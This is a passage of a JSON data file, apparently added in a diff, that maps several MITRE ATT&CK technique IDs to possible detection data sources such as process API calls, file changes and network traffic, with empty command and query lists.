"definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1565.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1565.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null + ] + }, + { + "technique_id": "T1565", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null + ] + }, + { + "technique_id": "T1563.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + 